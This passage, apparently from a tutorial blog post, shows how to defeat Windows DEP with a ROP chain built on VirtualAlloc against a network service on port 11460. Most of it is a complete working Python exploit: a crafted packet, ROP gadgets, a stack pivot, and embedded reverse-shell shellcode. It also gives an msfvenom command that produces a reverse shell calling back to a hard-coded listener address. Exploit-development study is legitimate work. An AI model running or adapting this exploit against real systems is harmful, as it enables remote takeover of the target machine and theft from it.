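rop_end = rop_start + ROP_DWORDS * 4
shellcode_start = rop_end + PADDING

print(hex(shellcode_start - ret_slot))        # distance used for the return address
print(hex(shellcode_start - (ret_slot + 4)))  # distance used for lpAddress
```

If a gadget is added to or removed from the chain, either the padding or the two offsets have to change by the same number of bytes.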

Verifying the Jump to Shellcode

After updating the script, we rerun the exploit and set a breakpoint at KERNEL32!VirtualAllocStub in the debugger to monitor the flow.

PNG

PNG |

Let the program pass through VirtualAlloc. If our padding calculation is correct, the execution should land smoothly on our INT3 (breakpoint) instructions without triggering an Access Violation.

PNG

PNG |

As shown in the image above, EIP reached and executed the INT3 sequence. This proves that the execution flow from the ROP chain to the shellcode is correctly aligned, and so far no access violation has occurred, which means we have successfully bypassed DEP.

Expanding the Buffer for the Reverse Shell

The final step is to insert the actual shellcode. Before doing so, we must check the remaining space available in our buffer. A standard reverse shell shellcode usually requires a significant amount of space. We can check the remaining space in the debugger by calculating the distance from the current EIP to the end of the buffer.

PNG

PNG |

From the calculation above (0d53e609 - eip), we only have 240 bytes of space left. This is likely insufficient for a reverse shell payload.

Luckily, since we have full control over the input, we can increase the buffer size from 0x400 to 0x600 bytes to accommodate a larger payload.

CODE | 5

# psCommandBuffer
morepadding = b"\xcc" * (0x600 - 276 - 4 - len(rop) - len(padding) - len(shellcode))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode+morepadding,0,0,0,0)
buf += formatString
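The space budget for both buffer sizes can be estimated before running the exploit. In this sketch, `remaining_space` is a hypothetical helper that mirrors the length expression in the script, and `ROP_LEN` assumes the chain is the 70 dwords counted from the full exploit listing.

```python
def remaining_space(total, rop_len, padding_len, shellcode_len=0):
    """Bytes left in the buffer after the fixed parts and the shellcode."""
    return total - 276 - 4 - rop_len - padding_len - shellcode_len

ROP_LEN = 70 * 4     # assumption: 70 dwords, counted from the full exploit listing
PADDING_LEN = 0xE0

print(remaining_space(0x400, ROP_LEN, PADDING_LEN))   # space with the original size
print(remaining_space(0x600, ROP_LEN, PADDING_LEN))   # space after enlarging the buffer
```

One detail worth keeping in mind: in Python, multiplying a bytes object by a negative number yields an empty bytes object, so an oversized shellcode would not raise an error in the morepadding line. Checking that the result is not negative avoids sending a buffer of unexpected length.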

Generating Shellcode

Now we can generate the final shellcode using msfvenom. To ensure the exploit remains stable, we must use the -b flag to exclude the bad characters we identified earlier: \x00\x09\x0a\x0b\x0c\x0d\x20.

CODE | 1

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.175 LPORT=8080 -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode
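After generating the payload, it is worth confirming that none of the excluded bytes slipped through. The following is a minimal sketch with a hypothetical helper name, `find_bad_chars`; the sample bytes are the first line of the shellcode shown in the final script.

```python
BAD_CHARS = b"\x00\x09\x0a\x0b\x0c\x0d\x20"

def find_bad_chars(payload, bad=BAD_CHARS):
    """Return (offset, byte) pairs for every bad character found in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

sample = b"\xba\xfb\xc3\x47\xa4\xdb\xc8\xd9\x74\x24\xf4"
print(find_bad_chars(sample))                 # []
print(find_bad_chars(b"\x41\x20\x42\x00"))    # [(1, 32), (3, 0)]
```

The same check can be run over `rop` and `padding`, since a bad character anywhere in the string would cut the copy short.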

Full Chain and Reverse Shell

With the final shellcode ready, we replace the INT3 dummy payload in our script. Here is the final structure of the completed exploit:

CODE | 194

import socket
import sys
from struct import pack

# psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534)  # opcode
buf += pack("<i", 0x0)    # 1st memcpy: offset
buf += pack("<i", 0x700)  # 1st memcpy: size field
buf += pack("<i", 0x0)    # 2nd memcpy: offset
buf += pack("<i", 0x100)  # 2nd memcpy: size field
buf += pack("<i", 0x0)    # 3rd memcpy: offset
buf += pack("<i", 0x100)  # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)


# Placeholder VirtualAlloc
va  = pack("<L", (0x45454545)) # [Function] Dummy VirtualAlloc address (will be patched)
va += pack("<L", (0x46464646)) # [Ret Addr] Shellcode return address (jump to the shellcode after VirtualAlloc finishes)
va += pack("<L", (0x47474747)) # [Arg 1] Dummy lpAddress: shellcode location
va += pack("<L", (0x48484848)) # [Arg 2] Dummy dwSize: shellcode size
va += pack("<L", (0x49494949)) # [Arg 3] Dummy flAllocationType: (0x1000 / MEM_COMMIT)
va += pack("<L", (0x51515151)) # [Arg 4] Dummy flProtect: (0x40 / PAGE_EXECUTE_READWRITE)

# Adjust offset calculation 
offset = b"A" * (276 - len(va))

# Saving Extended Stack Pointer Address
eip = pack("<L", (0x50501110)) # push esp ; push eax ; pop edi; pop esi ; ret

# Obtaining and Patching VirtualAlloc Address
rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) # VirtualAlloc IAT + 1
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffff)) # -1 into ecx
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Patching Return Address by 4 bytes

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

# Patching Shellcode Return Address

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf0)) # -0x210
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Patching VirtualAlloc Arguments

## Patching lpAddress
### Align ESI to lpAddress placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # junk
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf4)) # -0x20c
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

## Patching dwSize
### Align ESI to dwSize placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret  
rop += pack("<L", (0xffffffff)) # -1 into EAX
rop += pack("<L", (0x50527840)) # neg eax ; ret →  EAX=0x1
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret  → Write 0x1 to dwSize


# Patching flAllocationType
## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (no null byte)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

## Perform calculation: EAX = EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret 

## Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Patching flProtect
## Align ESI +4 to point to flProtect placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Add EAX + ECX = 0x100000040, truncated to 32 bits -> 0x40 (PAGE_EXECUTE_READWRITE)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Executing VirtualAlloc
## Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

# Padding to bridge ROP chain and shellcode
padding = b"C" * 0xe0

# Shellcode Reverse Shell
shellcode =  b""
shellcode += b"\xba\xfb\xc3\x47\xa4\xdb\xc8\xd9\x74\x24\xf4"
shellcode += b"\x58\x29\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e"
shellcode += b"\x03\xab\xcd\xa5\x51\xb7\x3a\xab\x9a\x47\xbb"
shellcode += b"\xcc\x13\xa2\x8a\xcc\x40\xa7\xbd\xfc\x03\xe5"
shellcode += b"\x31\x76\x41\x1d\xc1\xfa\x4e\x12\x62\xb0\xa8"
shellcode += b"\x1d\x73\xe9\x89\x3c\xf7\xf0\xdd\x9e\xc6\x3a"
shellcode += b"\x10\xdf\x0f\x26\xd9\x8d\xd8\x2c\x4c\x21\x6c"
shellcode += b"\x78\x4d\xca\x3e\x6c\xd5\x2f\xf6\x8f\xf4\xfe"
shellcode += b"\x8c\xc9\xd6\x01\x40\x62\x5f\x19\x85\x4f\x29"
shellcode += b"\x92\x7d\x3b\xa8\x72\x4c\xc4\x07\xbb\x60\x37"
shellcode += b"\x59\xfc\x47\xa8\x2c\xf4\xbb\x55\x37\xc3\xc6"
shellcode += b"\x81\xb2\xd7\x61\x41\x64\x33\x93\x86\xf3\xb0"
shellcode += b"\x29\x87\x40\x2a\x22\x62\x66\x99\x43\xa7"

# psCommandBuffer
morepadding = b"\xcc" * (0x600 - 276 - 4 - len(rop) - len(padding) - len(shellcode))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode+morepadding,0,0,0,0)
buf += formatString


# Checksum field: big-endian 32-bit value of len(buf) - 4, prepended to the packet
buf = pack(">i", len(buf)-4) + buf

def main():
    if len(sys.argv) != 2:
        print("Usage: %s <ip_address>\n" % (sys.argv[0]))
        sys.exit(1)

    server = sys.argv[1]
    port = 11460

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))

    # sendall() keeps writing until the whole packet has been sent
    s.sendall(buf)
    s.close()

    print("[+] Packet sent")
    sys.exit(0)


if __name__ == "__main__":
    main()
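
The constants in the chain above rely on 32-bit wraparound to produce small values without embedding null bytes. The following is a minimal sketch, not part of the exploit, that re-checks that arithmetic in plain Python. The helper names (`add32`, `sub32`, `neg32`, `has_null_byte`) are made up for illustration, and only the null byte is checked because that is the bad character the comments mention.

```python
from struct import pack

MASK32 = 0xFFFFFFFF  # registers are 32 bits wide, so arithmetic wraps modulo 2**32


def add32(a, b):
    """Emulate `add eax, ecx` on 32-bit registers."""
    return (a + b) & MASK32


def sub32(a, b):
    """Emulate `sub eax, ecx` on 32-bit registers."""
    return (a - b) & MASK32


def neg32(a):
    """Emulate `neg eax` (two's-complement negation)."""
    return (-a) & MASK32


def has_null_byte(value):
    """Return True if the little-endian encoding of value contains 0x00."""
    return b"\x00" in pack("<L", value)


# Values placed on the stack by the chain
STACK_CONSTANTS = [0xFFFFFDF4, 0xFFFFFFFF, 0x80808080, 0x7F7F8F80, 0x7F7F7FC0, 0xFFFFFFE8]

dw_size = neg32(0xFFFFFFFF)                          # dwSize
fl_allocation_type = add32(0x80808080, 0x7F7F8F80)   # MEM_COMMIT
fl_protect = add32(0x80808080, 0x7F7F7FC0)           # PAGE_EXECUTE_READWRITE
lp_address_delta = sub32(0, 0xFFFFFDF4)              # effect of sub eax, ecx with ecx = -0x20c

print(hex(dw_size), hex(fl_allocation_type), hex(fl_protect), hex(lp_address_delta))
print("null bytes on stack:", any(has_null_byte(c) for c in STACK_CONSTANTS))
```

Writing 0x1000 or 0x40 directly would put three null bytes into the buffer, which is why the chain computes them at run time instead.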

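Once the exploit runs, the ROP chain pivots the stack onto the patched VirtualAlloc call, VirtualAlloc marks the memory holding our payload as executable (flProtect 0x40, PAGE_EXECUTE_READWRITE), and execution returns into the buffer, passes over the padding, and finally runs our reverse shell.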
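
To see why the chain subtracts 24 from ESI before the pivot, here is a small sketch that models the call frame. It assumes the skeleton is laid out as VirtualAlloc pointer, return address, then the four arguments in order, and that ESI still points at the flProtect placeholder after the last write. `FRAME_BASE` is a made-up address and `pivot` is a hypothetical helper, not something from the exploit.

```python
# Hypothetical address of the VirtualAlloc slot in the skeleton (illustrative only)
FRAME_BASE = 0x0D2FE300

# Assumed skeleton order: function pointer, return address, then the four arguments
SLOTS = ["VirtualAlloc", "return address", "lpAddress", "dwSize",
         "flAllocationType", "flProtect"]


def slot_address(name, base=FRAME_BASE):
    """Address of a named 4-byte slot in the skeleton."""
    return base + 4 * SLOTS.index(name)


def pivot(esi):
    """Emulate: eax = esi - 24 ; xchg eax, ebp ; mov esp, ebp ; pop ebp ; ret.

    Returns the address whose dword the final `ret` loads into EIP.
    """
    esp = (esi + 0xFFFFFFE8) & 0xFFFFFFFF  # add eax, ecx with ecx = -24
    esp += 4                                # pop ebp consumes one dword
    return esp


esi = slot_address("flProtect")
print(hex(pivot(esi)), pivot(esi) == slot_address("VirtualAlloc"))
```

Under these assumptions, flProtect sits 20 bytes above the VirtualAlloc slot, and the extra 4 bytes compensate for the `pop ebp` in the pivot gadget, so the final `ret` picks up the VirtualAlloc pointer and leaves ESP on the patched return address.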


Defeating Windows DEP Using ROP Chains Leveraging VirtualAlloc

Maland | Saturday, February 28, 2026
